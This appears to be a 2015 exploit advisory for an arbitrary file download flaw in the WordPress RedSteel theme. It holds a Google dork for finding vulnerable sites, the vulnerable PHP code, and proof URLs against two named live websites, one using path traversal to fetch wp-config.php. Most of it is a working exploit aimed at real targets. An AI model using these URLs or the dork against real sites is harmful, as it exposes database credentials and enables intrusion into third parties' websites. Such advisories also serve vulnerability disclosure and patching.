WordPress RedSteel theme suffers from a file disclosure vulnerability. Note that this finding houses site-specific data.
8a8b4ccb9d8e631c26e3dc2dfe473c46f7651237b41364e8ae30f0f5eb5e1d36
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/RedSteel
|
|[*] Date : Date: 2015-01-25
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage :
http://www.webdesignlessons.com/redsteel-wordpress-theme/
|
|[*] Tested on: Windows 7
|
|[*] Discovered By : ACC3SS
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/RedSteel/download.php?file=filename.php
|
|-------------------------------------------------------------------------|download.php
| Vulnerable file : download.php
|
| Vulnerable code :
|
<?php
$file = @$_GET['file'];
$parts = explode('/',$file);
$fileName = $parts[sizeof($parts)-1];
if ((isset($file))&&(file_exists($file))) {
header("Content-type: application/force-download");
header('Content-Disposition: inline; filename="' . $fileName . '"');
header("Content-Transfer-Encoding: Binary");
header("Content-length: ".filesize($file));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $fileName . '"');
readfile($file);
}
?>
|
|
|
|
|
|
|[*] Proof:
|
|[*]
http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
|
|[*]
http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php
|
|[*]
|
|
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|